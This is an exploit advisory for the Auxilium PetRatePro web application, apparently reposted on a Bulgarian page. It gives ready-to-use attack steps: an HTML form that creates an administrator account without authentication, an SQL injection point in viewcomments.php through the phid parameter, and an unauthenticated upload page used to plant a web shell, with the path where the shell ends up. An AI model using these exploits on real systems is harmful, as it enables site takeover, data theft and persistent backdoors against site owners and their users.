##########################################
[~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
[~] Date: 14/09/2012
[~] Author: DaOne (@LibyanCA)
[~] Software Link: http://www.auxiliumsoftware.com
[~] Google Dork: "N/A"
##########################################

[#] 1-[Remote Add Admin]:

<form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
(Create New Administrator)
Username
<input name="username" type="text" id="name" size="20">
Password<input name="upassword" type="text" id="upassword" size="20">
Name<input name="name1" type="text" id="name1" size="20">
Email Address <input name="email" type="text" id="email" size="20">
<input type="submit" value="Create " name="B1">
</form>



[#] 2-[SQL Injection]

viewcomments.php parameter phid

http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]



[#] 3-[Remote File Upload]

Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
and upload your Shell...
will find files here ... /PetRatePro/banners/shell.php


##########################################
[*] Contact me
www.facebook.com/DaOne.Ly
##########################################
Rate this post
Брой прочитания на тази страница: 493
Auxilium PetRatePro Multiple Vulnerabilities

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *